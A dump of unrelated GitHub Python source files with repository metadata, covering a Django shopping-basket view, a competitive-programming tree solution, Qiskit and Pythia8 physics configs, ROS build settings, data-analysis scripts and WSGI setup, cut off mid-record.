refs/heads/master
| 2023-07-21T03:56:48.386869
| 2021-09-03T17:03:17
| 2021-09-03T17:04:24
| 402,333,026
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,878
|
py
|
from django.http import JsonResponse
from django.shortcuts import get_object_or_404, render
from Basket.models import Basket
from Coupon.forms import CouponApplyForm
from Product.models import Book
def basket_summary(request):
basket = Basket(request)
return render(request, 'summary.html', {'basket': basket})
def basket_add(request):
basket = Basket(request)
if request.POST.get('action') == 'post':
product_id = int(request.POST.get('productid'))
product_qty = int(request.POST.get('productqty'))
product = get_object_or_404(Book, id=product_id)
basket.add(product=product, qty=product_qty)
coupon_apply_forms = CouponApplyForm()
if product.inventory != 0 and product_qty < product.inventory:
basket.add(product=product, qty=product_qty)
product.remove_items_from_inventory(product_qty)
basketqty = basket.__len__()
response = JsonResponse({'qty': basketqty})
return response
def basket_delete(request):
basket = Basket(request)
if request.POST.get('action') == 'post':
product_id = int(request.POST.get('productid'))
basket.delete(product=product_id)
basketqty = basket.__len__()
baskettotal = basket.get_total_price()
response = JsonResponse({'qty': basketqty, 'subtotal': baskettotal})
return response
def basket_update(request):
basket = Basket(request)
if request.POST.get('action') == 'post':
product_id = int(request.POST.get('productid'))
product_qty = int(request.POST.get('productqty'))
basket.update(product=product_id, qty=product_qty)
basketqty = basket.__len__()
baskettotal = basket.get_total_price()
response = JsonResponse({'qty': basketqty,
'subtotal': baskettotal})
return response
|
[
"you@example.com"
] |
you@example.com
|
71e602bd3e84c341393cd3c2e541ba225c4b8f71
|
99da8a6d2392472cb66e5b12c03142c90640186a
|
/BOJ/Tree/1967.py
|
ffb3ad1267e97478a1e3e17f42bfe629009b13f3
|
[] |
no_license
|
chorwonkim/__Algorithms__
|
cf6cf4ae5cf091d856397369b6db1bb41f925377
|
0c1e58410ae90b72c0d7e44a6179b8fedc786131
|
refs/heads/master
| 2022-09-28T16:59:20.841482
| 2022-09-25T09:57:58
| 2022-09-25T09:57:58
| 130,082,803
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,486
|
py
|
from sys import stdin
from collections import deque
Read = stdin.readline
n = int(Read())
graph = [[] for _ in range(n)]
# for _ in range(n-1):
# x, y, z = map(int, Read().split())
#
# graph[x-1].extend((y-1, z))
# graph[y-1].extend((x-1, z))
#
# print(graph)
#
#
# def func_1967(start, node):
# d = deque(start)
#
# while d:
# root = d.popleft()
# length = d.popleft()
#
# if visited[root]:
# node += 1
# continue
#
# visited[root] += length
# visited_path[node].append(root)
#
# for sub in graph[root]:
# d.append(sub)
#
#
# visited = [1] + [0 for _ in range(n-1)]
# visited_path = [[] for _ in range(n)]
# func_1967(graph[0], 0)
# print(visited)
# print(visited_path)
# for _ in range(n-1):
# x, y, z = map(int, Read().split())
#
# graph[x-1].extend((y-1, z))
#
# print(graph)
#
#
# def func_1967(start):
# d = deque(start)
#
# while d:
# root = d.popleft()
# length = d.popleft()
#
# visited[root] += length
#
#
# visited = [1] + [0 for _ in range(n-1)]
# for i in range(n):
# func_1967(graph[i])
# print(visited)
# for _ in range(n-1):
# x, y, z = map(int, Read().split())
#
# graph[x-1].extend((y-1, z))
# graph[y-1].extend((x-1, z))
#
# print(graph)
#
#
# def func_1967(start, node):
# d = deque(start)
#
# while d:
# root = d.popleft()
# length = d.popleft()
#
# if root > node:
# visited[root] += length
# else:
# visited[node] += visited[root]
#
#
# visited = [0 for _ in range(n)]
#
# for i in range(n):
# func_1967(graph[i], i)
#
# print(visited)
for _ in range(n-1):
x, y, z = map(int, Read().split())
graph[x-1].extend((x-1, y-1, z))
graph[y-1].extend((y-1, x-1, z))
def func_1967(start):
d = deque(graph[start])
visited[start] = True
while d:
node = d.popleft()
root = d.popleft()
length = d.popleft()
if visited[root]:
visited_path[node] += visited_path[root]
continue
visited[root] = True
visited_path[root] += length
for sub in graph[root]:
d.append(sub)
visited_path = [0 for _ in range(n)]
visited = [False for _ in range(n)]
func_1967(0)
temp = max(visited_path)
t1 = visited_path.index(temp)
visited_path = [0 for _ in range(n)]
visited = [False for _ in range(n)]
func_1967(t1)
print(max(visited_path))
|
[
"upheaval212@gmail.com"
] |
upheaval212@gmail.com
|
dea0ba39768a7c8ede0d9bf90e3b3f51c7138806
|
9c50f57a9cb32b44e86a0cdcbf61ead34754b085
|
/杂物间/python基础/day06/作业九.py
|
0b2ba089221b23677327707278422873cfa7b562
|
[] |
no_license
|
a1403893559/rg201python
|
c3f115011981393c86a0150e5281096651712ad4
|
448f04c86e4c7fd30e3a2a4f9121b934ae1d49be
|
refs/heads/master
| 2020-03-15T23:32:17.723403
| 2018-03-18T12:59:43
| 2018-03-18T12:59:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 206
|
py
|
# 题目要求是 使用字典 存储熟人信息 其实呢 就是名片
shu_ren = {'name':'李文浩','age':'18','city':'山西煤窑'}
for key,value in shu_ren.items():
print('%s:%s'%(key,value))
|
[
"wengwenyu@aliyun.com"
] |
wengwenyu@aliyun.com
|
377cdbfbe4bc9e17cc34e3664bff5057689407cd
|
4ae7cdc9292009398a292bdf6bee61428559fdfd
|
/SourceCodeTools/code/data/sourcetrail/nodes_of_interest_from_dataset.py
|
d9e69bccbc79dc112cfbe4294211e25a29fc1878
|
[] |
no_license
|
VitalyRomanov/method-embedding
|
52a4e6e7bf726b4db0872902a0eaf1d8cb82b4a8
|
1c8f0fc04eb1f495555272d9747fd2fea68525e1
|
refs/heads/master
| 2023-08-31T17:39:04.051912
| 2023-01-08T05:02:52
| 2023-01-08T05:02:52
| 219,153,628
| 5
| 7
| null | 2023-07-22T20:27:20
| 2019-11-02T12:54:12
|
Python
|
UTF-8
|
Python
| false
| false
| 707
|
py
|
import json
def get_node_ids_from_dataset(dataset_path):
node_ids = []
with open(dataset_path, "r") as dataset:
for line in dataset:
entry = json.loads(line)
for _, _, id_ in entry["replacements"]:
node_ids.append(int(id_))
return node_ids
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("dataset")
parser.add_argument("output")
args = parser.parse_args()
node_ids = get_node_ids_from_dataset(args.dataset)
with open(args.output, "w") as sink:
sink.write("node_id\n")
for id_ in node_ids:
sink.write(f"{id_}\n")
if __name__ == "__main__":
main()
|
[
"mortiv16@gmail.com"
] |
mortiv16@gmail.com
|
7351ff746480493141320d2010c33f6f1d6936d8
|
61b9e597f0bd27ee7ec86188b7e10518ee30425c
|
/tests/run_cache_experiments.py
|
cc4d49b11eb3b1381b7a355b51f7b474a639d114
|
[] |
no_license
|
sirrice/dbwipes_src
|
eeb369d09ba28cb1ab3ffa70551c2b253dd39cb3
|
4d42b7d51af190b21679f38150f85dec1496d78c
|
refs/heads/master
| 2021-01-21T12:36:22.888835
| 2014-04-23T20:53:16
| 2014-04-23T20:53:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,696
|
py
|
import os
from sqlalchemy import *
from common import *
def print_clusters(sub, dim, clusters=[], tuples=[], title=''):
xattr = 'a_%d' % dim
yattr = 'a_%d' % (dim+1)
for cluster in clusters:
bbox = tuple(map(list, zip(*cluster.bbox)))
# we want bounds for attrs a_dim, a_dim+1, but bbox cols
# may not be ordered as we like
if xattr in cluster.cols:
xidx = cluster.cols.index(xattr)
x = bbox[xidx]
x[0] = max(0, x[0])
x[1] = min(100, x[1])
else:
x = [0, 100]
if yattr in cluster.cols:
yidx = cluster.cols.index(yattr)
y = bbox[yidx]
y[0] = max(0, y[0])
y[1] = min(100, y[1])
else:
y = [0, 100]
c = cm.jet(cluster.error)
r = Rect((x[0], y[0]), x[1]-x[0], y[1]-y[0], alpha=min(1., max(0.2,cluster.error)), ec=c, fill=False, lw=1.5)
sub.add_patch(r)
if tuples:
cols = zip(*tuples)
xs, ys, cs = cols[dim], cols[dim+1], cols[-2]
cs = np.array(cs) / 100.
sub.scatter(xs, ys, c=cs, alpha=0.5, lw=0)
sub.set_ylim(-5, 105)
sub.set_xlim(-5, 105)
sub.set_title(title)
def print_all_clusters(pp, db, tablename, learner, c):
try:
all_clusters = [cluster.clone() for cluster in learner.all_clusters]
all_clusters = normalize_cluster_errors(all_clusters)
clusters = [cluster.clone() for cluster in learner.final_clusters]
clusters = normalize_cluster_errors(clusters)
best_clusters = sorted(clusters, key=lambda c: c.error, reverse=True)
best_clusters = best_clusters[:2]
best_clusters[0].error = 1
tuples = get_tuples_in_bounds(db, tablename, [], 'g = 7')
for cl in clusters:
print str(cl), cl.c_range
for dim in xrange(len(tuples[0])-4):
suffix = "%.4f dim %d" % (c, dim)
fig = plt.figure(figsize=(12, 4))
print_clusters(fig.add_subplot(1, 3, 1), dim, all_clusters, tuples=tuples,title="merged %s" % suffix)
print_clusters(fig.add_subplot(1, 3, 2), dim, clusters, tuples=tuples,title="merged %s" % suffix)
print_clusters(fig.add_subplot(1, 3, 3), dim, best_clusters, tuples=tuples, title="best %s" % suffix)
plt.savefig(pp, format='pdf')
except Exception as e:
import traceback
traceback.print_exc()
pdb.set_trace()
pass
def run(pp, cutoff, **params):
dataset = params['dataset']
test_datas = get_test_data(datasetnames[dataset])
tablename = test_datas[-1]
dbname = test_datas[0]
db = create_engine('postgresql://localhost/%s' % dbname)
costs, rules, all_ids, table_size, learner = run_experiment(dataset, **params)
cost = costs['cost_total']
ft = learner.full_table
print len(ft)
truth = [int(row['id'].value) for row in ft if row['v'] >= cutoff]
all_stats = [compute_stats(ids, truth, table_size) for ids in all_ids]
stats, rule, ids = tuple(zip(all_stats, rules, all_ids)[0])
data = tuple([tablename,params['c'],cost]+list(stats))
print "stats:%s,c(%.3f),cost(%.2f),%.6f,%.6f,%.6f,%.6f" % data
print 'stats:%s'% str(sdrule_to_clauses(rule.simplify())[0])
print_all_clusters(pp, db, tablename, learner, params['c'])
return costs
def warmup(dim, cutoff, **kwargs):
dataset = "data_%d_%d_1000_0d50_%duo" % (dim, dim, cutoff)
params = {
'klass':BDT,
'nbadresults' : 10,
'epsilon':0.005,
'tau':[0.1, 0.5],
'p' : 0.7,
'l':.5,
'min_pts' : 10,
'min_improvement':.01,
'granularity':15,
'max_wait':1,
'naive':False,
'use_mtuples':False,
'use_cache': False
}
params.update(kwargs)
ft, bts, gts, truth, aggerr, cols = get_parameters(dataset, **params)
params.update({
'aggerr' : aggerr,
'cols' : cols,
'tablename' : dataset,
'dataset' : dataset
})
learner = BDT(**params)
learner.setup_tables(ft, bts, gts, **params)
learner.get_partitions(ft, bts, gts, **params)
def run_cache(dim, cutoff, cs, **kwargs):
dataset = kwargs.get('dataset', "data_%d_%d_1000_0d50_%duo" % (dim, dim, cutoff))
params = {
'klass':BDT,
'nbadresults' : 10,
'epsilon':0.005,
'tau':[0.1, 0.5],
'p' : 0.7,
'l':.5,
'min_pts' : 10,
'min_improvement':.01,
'granularity':15,
'max_wait':20,
'naive':False,
'use_mtuples':False,
'use_cache': False,
dataset: dataset
}
params.update(kwargs)
pp = PdfPages('figs/topdown_all_%s.pdf' % str(dataset))
cost_dicts = []
for c in cs:
params['c'] = c
cost_dict = run(pp, cutoff, **params)
cost_dicts.append(cost_dict)
pp.close()
return cost_dicts
def reset_cache():
try:
os.system('rm dbwipes*.cache')
except:
pass
if __name__ == '__main__':
np.seterr(all='raise')
if len(sys.argv) < 4:
print "python run_cache_experiments.py [dimensions] [30|80] [cache? 0|1] [list of cs values]"
print "cs values defaults to [.5, .4, .3, .2, .1, .05, 0]"
sys.exit()
dim = int(sys.argv[1])
uo = int(sys.argv[2])
cache = bool(int(sys.argv[3]))
cs = map(float, sys.argv[4:])
if not cs:
cs = [.5, .4, .3, .2, .1, 0.05, 0.0]
#reset_cache()
#cachecost_dicts = run_cache(dim, uo, cs, l=0.95, tree_alg='rt', klass=NDT, use_cache=cache, tau= [0.1, 0.5])
cachecost_dicts = run_cache(dim, uo, cs, l=0.85, tree_alg='rt', klass=BDT,
epsilon=0.001, use_cache=cache, tau= [0.02, 0.5],
c_range=[0.01, 0.7],
dataset='data2clust_2_2_2k_vol20_uo80')
print "c,total,partbad,partgood,split,merge,cache"
for c, cd in zip(cs, cachecost_dicts):
print "%.4f,%.4f,%.4f,%.4f,%.4f,%.4f,%d" % (
c,
cd.get('cost_total', -1),
cd.get('cost_partition_bad', -1),
cd.get('cost_partition_good', -1),
cd.get('cost_split', -1),
cd.get('cost_merge', -1),
cache
)
|
[
"sirrice@gmail.com"
] |
sirrice@gmail.com
|
44a318abdeab78a4e1fc6de40b655367ad1b4e90
|
d30aba490a9527e7fc1f31e178b5f1c3067ae84d
|
/build/combined_robot_hw_tests/catkin_generated/pkg.develspace.context.pc.py
|
13c2aeff20a5c6b70551c5306392f462066cbd7e
|
[] |
no_license
|
weetinygit/tart
|
130845b9c0e7b01d0a5a5177b056c85495e4e5cc
|
339344cb9ef0561655f73f4609f340974113785a
|
refs/heads/master
| 2021-09-13T07:38:39.706301
| 2018-04-26T21:18:19
| 2018-04-26T21:18:19
| 111,699,891
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/weety/tart5/src/roscontrol/src/ros_control/combined_robot_hw_tests/include".split(';') if "/home/weety/tart5/src/roscontrol/src/ros_control/combined_robot_hw_tests/include" != "" else []
PROJECT_CATKIN_DEPENDS = "combined_robot_hw;hardware_interface;roscpp".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lcombined_robot_hw_tests".split(';') if "-lcombined_robot_hw_tests" != "" else []
PROJECT_NAME = "combined_robot_hw_tests"
PROJECT_SPACE_DIR = "/home/weety/tart5/devel/.private/combined_robot_hw_tests"
PROJECT_VERSION = "0.12.0"
|
[
"weetingyit36@gmail.com"
] |
weetingyit36@gmail.com
|
145d8b4115c4d955272564fad60a095f75f40fab
|
4a4cc797f9a46a2c09075abfc2033c480eaa5486
|
/mini-programs/week_2/lectures/lecture_1_logical_data_type, conditional_operator_and_cycles.py
|
25f6b5cd500aa4069b3494dd7ee0525bd4c0d4d9
|
[] |
no_license
|
h1mik/python_programs
|
efa806eb9803c3e50aee845d5e0be9560d65f2be
|
33e169ef33f70bc94cd535ecf44e852ae58c7a64
|
refs/heads/main
| 2023-02-04T14:45:04.855119
| 2020-12-26T09:25:22
| 2020-12-26T09:25:22
| 309,483,948
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 333
|
py
|
# True and False |
# (==) - равно | (> ) - больше
# (!=) - не равно | (<=) - меньше равно
# (<) - меньше | (>=) - больше равно
# (and or) - бинарные | (not) - унарная
x = 4
y = 6
print(x < y)
st1 = "Books"
st2 = "Alpha"
print(not st1 > st2)
|
[
"seigneur.h1mik@gmail.com"
] |
seigneur.h1mik@gmail.com
|
95591f4a5fbda649b1639552fefac75304660451
|
917a690cad8fece9102ba3191284f1ab83a8aeaf
|
/pypubmed/util/__init__.py
|
19406ff5499cccc2d0e8abe969aa2ba74bd4aff0
|
[
"MIT"
] |
permissive
|
wisRen/pypubmed
|
1751f429e38f4fd58d058584d36e7a4031c02660
|
6dd1b6ee7e8c7cf2a10885ed7662a4e2d16fa8e4
|
refs/heads/master
| 2023-06-21T05:10:47.579755
| 2021-08-11T06:01:05
| 2021-08-11T06:01:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 336
|
py
|
import os
def safe_open(filename, mode='r'):
if 'w' in mode:
dirname = os.path.dirname(filename)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
if filename.endswith('.gz'):
import gzip
return gzip.open(filename, mode=mode)
return open(filename, mode=mode)
|
[
"suqingdong1114@gmail.com"
] |
suqingdong1114@gmail.com
|
d5017384859880726a5577c4f806d918eefbdd79
|
d85163b314c220e88e99426ab4e10f031423aeb2
|
/qc/outremont/districts/definition.py
|
3c55d715faa90a28b9fc8ce3ea1aa64642c9bdbf
|
[] |
no_license
|
opennorth-archive/represent-canada-data
|
dc3e98d4f24ce877ec2dfc9e40675e561912c45f
|
f1792a724f0a58d596e3376c71b6b3e64f7887b0
|
refs/heads/master
| 2021-01-22T05:10:00.952023
| 2014-04-04T19:51:40
| 2014-04-04T19:52:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 780
|
py
|
# coding: utf-8
from datetime import date
import boundaries
boundaries.register(u'Outremont districts',
domain=u'Outremont, Montréal, QC',
last_updated=date(2013, 10, 16),
name_func=lambda f: re.sub(u'', u'—', f.get('NOM_DISTRI')), # control character, m-dash
authority=u'Ville de Montréal',
source_url='http://donnees.ville.montreal.qc.ca/dataset/elections-2013-districts-electoraux',
licence_url='http://donnees.ville.montreal.qc.ca/licence/licence-texte-complet/',
data_url='http://donnees.ville.montreal.qc.ca/storage/f/2013-10-16T14%3A16%3A09.092Z/districtelect.zip',
encoding='iso-8859-1',
metadata={'ocd_division': u'ocd-division/country:ca/csd:2466023/borough:outremont'},
ogr2ogr=u'''-where "ARRONDISSE='Outremont'"''',
)
|
[
"james@slashpoundbang.com"
] |
james@slashpoundbang.com
|
4245cd1c1914d5cde8d48f77bc3b37941ee4b174
|
0eb0cc67c11baec9caf82b61f161c091c7043364
|
/api_book/wsgi.py
|
d6be60053dfb1ff1084624d501fbd456288cf37a
|
[] |
no_license
|
juniorcarvalho/work-at-olist
|
dd648fceaed5e0f8b165ac1279cfb1ae1ccae0a5
|
fc59143c8d295da50aa42b312aa28ce1202ec890
|
refs/heads/master
| 2022-07-17T23:54:29.071100
| 2020-05-19T22:40:11
| 2020-05-19T22:40:11
| 264,524,765
| 0
| 0
| null | 2020-05-16T20:49:54
| 2020-05-16T20:49:54
| null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
"""
WSGI config for api_book project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from dj_static import Cling
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'api_book.settings')
application = Cling(get_wsgi_application())
|
[
"joseadolfojr@gmail.com"
] |
joseadolfojr@gmail.com
|
dd071b116f01cd5df223b91b2af30535c163e630
|
7d17161a77ad04ea1de1dabe84619b6c4fffe2ad
|
/test/python/circuit/library/test_piecewise_chebyshev.py
|
14660435d445ca3a3e2114e685177d21bf94b665
|
[
"Apache-2.0"
] |
permissive
|
annos-IBM/qiskit-terra
|
5e3b93a089a6e00c9279bf82735d78b497e92023
|
78ece7ad9baba64395eea98c45fb83a30b04c835
|
refs/heads/main
| 2023-05-28T20:42:19.805833
| 2021-06-09T03:47:48
| 2021-06-09T03:47:48
| 375,329,407
| 1
| 0
|
Apache-2.0
| 2021-06-09T11:22:14
| 2021-06-09T11:22:14
| null |
UTF-8
|
Python
| false
| false
| 4,954
|
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test the piecewise Chebyshev approximation."""
import unittest
from collections import defaultdict
import numpy as np
from ddt import ddt, data, unpack
from qiskit.test.base import QiskitTestCase
from qiskit import BasicAer, execute
from qiskit.circuit import QuantumCircuit
from qiskit.circuit.library.arithmetic.piecewise_chebyshev import PiecewiseChebyshev
@ddt
class TestPiecewiseChebyshev(QiskitTestCase):
"""Test the piecewise Chebyshev approximation."""
def assertFunctionIsCorrect(self, function_circuit, reference):
"""Assert that ``function_circuit`` implements the reference function ``reference``."""
function_circuit._build()
num_state_qubits = function_circuit.num_state_qubits
num_ancilla_qubits = function_circuit.num_ancillas
circuit = QuantumCircuit(num_state_qubits + 1 + num_ancilla_qubits)
circuit.h(list(range(num_state_qubits)))
circuit.append(function_circuit.to_instruction(), list(range(circuit.num_qubits)))
backend = BasicAer.get_backend("statevector_simulator")
statevector = execute(circuit, backend).result().get_statevector()
probabilities = defaultdict(float)
for i, statevector_amplitude in enumerate(statevector):
i = bin(i)[2:].zfill(circuit.num_qubits)[num_ancilla_qubits:]
probabilities[i] += np.real(np.abs(statevector_amplitude) ** 2)
unrolled_probabilities = []
unrolled_expectations = []
for i, probability in probabilities.items():
x, last_qubit = int(i[1:], 2), i[0]
if last_qubit == "0":
expected_amplitude = np.cos(reference(x)) / np.sqrt(2 ** num_state_qubits)
else:
expected_amplitude = np.sin(reference(x)) / np.sqrt(2 ** num_state_qubits)
unrolled_probabilities += [probability]
unrolled_expectations += [np.real(np.abs(expected_amplitude) ** 2)]
np.testing.assert_array_almost_equal(
unrolled_probabilities, unrolled_expectations, decimal=3
)
@data((lambda x: np.arcsin(1 / x), 2, [2, 4], 2), (lambda x: x / 8, 1, [1, 8], 3))
@unpack
def test_piecewise_chebyshev(self, f_x, degree, breakpoints, num_state_qubits):
"""Test the piecewise Chebyshev approximation."""
def pw_poly(x):
if breakpoints[0] <= x < breakpoints[-1]:
return f_x(x)
return np.arcsin(1)
pw_approximation = PiecewiseChebyshev(f_x, degree, breakpoints, num_state_qubits)
self.assertFunctionIsCorrect(pw_approximation, pw_poly)
def test_piecewise_chebyshev_mutability(self):
"""Test the mutability of the piecewise Chebyshev approximation."""
def pw_poly(x, f_x):
if breakpoints[0] <= x < breakpoints[-1]:
return f_x(x)
return np.arcsin(1)
def f_x_1(x):
return x / 2
pw_approximation = PiecewiseChebyshev(f_x_1)
with self.subTest(msg="missing number of state qubits"):
with self.assertRaises(AttributeError): # no state qubits set
print(pw_approximation.draw())
with self.subTest(msg="default setup, just setting number of state qubits"):
pw_approximation.num_state_qubits = 2
pw_approximation.f_x = f_x_1
# set to the default breakpoints for pw_poly
breakpoints = [0, 4]
pw_approximation.breakpoints = breakpoints
self.assertFunctionIsCorrect(pw_approximation, lambda x: pw_poly(x, f_x_1))
def f_x_2(x):
return x / 4
with self.subTest(msg="setting non-default values"):
breakpoints = [0, 2]
degree = 2
pw_approximation.breakpoints = breakpoints
pw_approximation.degree = degree
pw_approximation.f_x = f_x_2
self.assertFunctionIsCorrect(pw_approximation, lambda x: pw_poly(x, f_x_2))
def f_x_3(x):
return x ** 2
with self.subTest(msg="changing all values"):
pw_approximation.num_state_qubits = 4
breakpoints = [1, 3, 6]
degree = 3
pw_approximation.breakpoints = breakpoints
pw_approximation.degree = degree
pw_approximation.f_x = f_x_3
self.assertFunctionIsCorrect(pw_approximation, lambda x: pw_poly(x, f_x_3))
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
annos-IBM.noreply@github.com
|
b9fdfca21b63d92c178c7c1277d346717e9cdced
|
0fccee4c738449f5e0a8f52ea5acabf51db0e910
|
/genfragments/ThirteenTeV/ADD/ADDmonoJet_MD_6_d_6_TuneCUETP8M1_13TeV_pythia8_cfi.py
|
85a31581696b8c9fa838b33ac1ac34c210e6a0db
|
[] |
no_license
|
cms-sw/genproductions
|
f308ffaf3586c19b29853db40e6d662e937940ff
|
dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4
|
refs/heads/master
| 2023-08-30T17:26:02.581596
| 2023-08-29T14:53:43
| 2023-08-29T14:53:43
| 11,424,867
| 69
| 987
| null | 2023-09-14T12:41:28
| 2013-07-15T14:18:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,923
|
py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1.0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
comEnergy = cms.double(13000.0),
maxEventsToPrint = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettings = cms.vstring('Tune:preferLHAPDF = 2',
'Main:timesAllowErrors = 10000',
'Check:epTolErr = 0.01',
'Beams:setProductionScalesFromLHEF = off',
'SLHA:keepSM = on',
'SLHA:minMassSM = 1000.',
'ParticleDecays:limitTau0 = on',
'ParticleDecays:tau0Max = 10',
'ParticleDecays:allowPhotonRadiation = on'),
pythia8CUEP8M1Settings = cms.vstring('Tune:pp 14',
'Tune:ee 7',
'MultipartonInteractions:pT0Ref=2.4024',
'MultipartonInteractions:ecmPow=0.25208',
'MultipartonInteractions:expPow=1.6'),
pythia8_unparticle = cms.vstring('ExtraDimensionsLED:monojet = on',
'ExtraDimensionsLED:CutOffmode = 1',
'ExtraDimensionsLED:t = 0.5',
'ExtraDimensionsLED:n = 6',
'ExtraDimensionsLED:MD = 6000.',
'5000039:m0 = 1200.',
'5000039:mWidth = 1000.',
'5000039:mMin = 1.',
'5000039:mMax = 13990.',
'PhaseSpace:pTHatMin = 80.',
'PartonLevel:ISR = on',
'PartonLevel:FSR = on',
'ParticleDecays:limitTau0 = on',
'ParticleDecays:tauMax = 10'),
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'pythia8_unparticle')
)
)
|
[
"ksung@cern.ch"
] |
ksung@cern.ch
|
7b45add26ddf9df79e85d7c7e09bc534253dae7d
|
a8139ccd50a27861d3c5a4168fd0e4b351c0a514
|
/material/code/advanced_oop_and_python_topics/4_ManagedAttributeDemo/test.py
|
9e8897b3d4a283a1395d9d8c0fe56f8a27ae63ef
|
[] |
no_license
|
shambhand/pythontraining
|
a124aa1485c3ce0e589fc2cd93c1e991746432e4
|
24dd923e2b2c07c70500775e3665e2a527240329
|
refs/heads/master
| 2021-05-17T22:54:45.331127
| 2019-01-11T03:12:59
| 2019-01-11T03:12:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,433
|
py
|
class Person:
def __init__(self, name):
self._name = name
@property # name = property(name)
def name(self):
"name property docs"
print('fetch...')
return self._name
@name.setter # name = name.setter(name)
def name(self, value):
print('change...')
self._name = value
@name.deleter # name = name.deleter(name)
def name(self):
print('remove...')
del self._name
def main ():
bob = Person('Bob Smith') # bob has a managed attribute
print(bob.name) # Runs name getter (name 1)
print ("addr(Person.name.getter):", hex(id((Person.name.getter))))
bob.name = 'Robert Smith' # Runs name setter (name 2)
print ("addr(Person.name.setter):", hex(id((Person.name.setter))))
print(bob.name)
del bob.name # Runs name deleter (name 3)
print('-'*20)
sue = Person('Sue Jones') # sue inherits property too
print(sue.name)
print(Person.name.__doc__) # Or help(Person.name)
print ("type (Person.name):", type (Person.name))
print ("hex(id(Person.name)):", hex(id(Person.name)))
print ("type (Person.name.getter):", type (Person.name.getter))
print ("type (Person.name.setter):", type (Person.name.setter))
print ("type (Person.name.deleter):", type (Person.name.deleter))
print ("addr(Person.name.getter):", hex(id((Person.name.getter))))
print ("addr (Person.name.setter):", hex(id((Person.name.setter))))
print ("addr (Person.name.deleter):", hex(id(Person.name.deleter)))
main ()
|
[
"amit2766@gmail.com"
] |
amit2766@gmail.com
|
6589281398355c7fc10996ec4525e0d770330e54
|
db57094349de63766daf70a2e6bdb06bf3af09cf
|
/Cap05_Tkinter/34_images.py
|
75d83162c1ff336bb175ae05bd17c0c8d302ff12
|
[] |
no_license
|
frclasso/turma1_Python_Modulo2_2019
|
2f9e9aebc48c1c0b92b684ad92958bc557866cde
|
0b7f0fac0a1de4a2dbe4ff4fb2985fbfee89ed33
|
refs/heads/master
| 2020-04-17T19:36:07.545787
| 2019-06-10T15:29:10
| 2019-06-10T15:29:10
| 166,871,517
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 310
|
py
|
from tkinter import *
from PIL import Image
from PIL import ImageTk
window = Tk()
window.title("Images and incons")
icon = Image.open('python_logo.png')
icon = icon.resize((300,200), Image.ANTIALIAS)
photoImg = ImageTk.PhotoImage(icon)
Label(window, image=photoImg).grid(row= 0, column=0)
window.mainloop()
|
[
"frcalsso@yahoo.com.br"
] |
frcalsso@yahoo.com.br
|
5878e977598eb5846f58ee444eb02ccef892e5d7
|
06cabd66791a5ee15bb3ba4b04d8bc8dea5bfda0
|
/Python modules/MakePdf_old.py
|
8203bd500d8b65d5bac2e798af6e0af5f18b62bc
|
[] |
no_license
|
claiello/python_data_analysis
|
f7405dfd15f0dccd2089b1878af40b9d075071d2
|
0b8d3cc5717243e72214dc24a7fc823220e13179
|
refs/heads/master
| 2020-04-17T20:36:51.720891
| 2017-04-23T10:00:08
| 2017-04-23T10:00:08
| 66,181,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 829
|
py
|
# test
from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
def multipage(filename, figs=None, dpi=200):
pp = PdfPages(filename)
if figs is None:
figs = [plt.figure(n) for n in plt.get_fignums()]
for fig in figs:
#fig.set_size_inches(1000./fig.dpi,600./fig.dpi)
fig.set_size_inches(1200./fig.dpi,900./fig.dpi)
fig.savefig(pp, format='pdf')
pp.close()
#plt.figure(figsize=(8, 6), dpi=80)
def multipage_longer(filename, figs=None, dpi=200):
pp = PdfPages(filename)
if figs is None:
figs = [plt.figure(n) for n in plt.get_fignums()]
for fig in figs:
#fig.set_size_inches(1000./fig.dpi,600./fig.dpi)
fig.set_size_inches(1600./fig.dpi,1200./fig.dpi)
fig.savefig(pp, format='pdf')
pp.close()
|
[
"claiello@gmail.com"
] |
claiello@gmail.com
|
5490923cd851a1f6025d71a2c24cadd7013227ab
|
28be2173e5590cc5b03119e9b83c57980e6a7e8a
|
/learnwithpeople/wsgi.py
|
70d79666fb99a92372c78e6ca89fa8357aaf18ee
|
[
"MIT"
] |
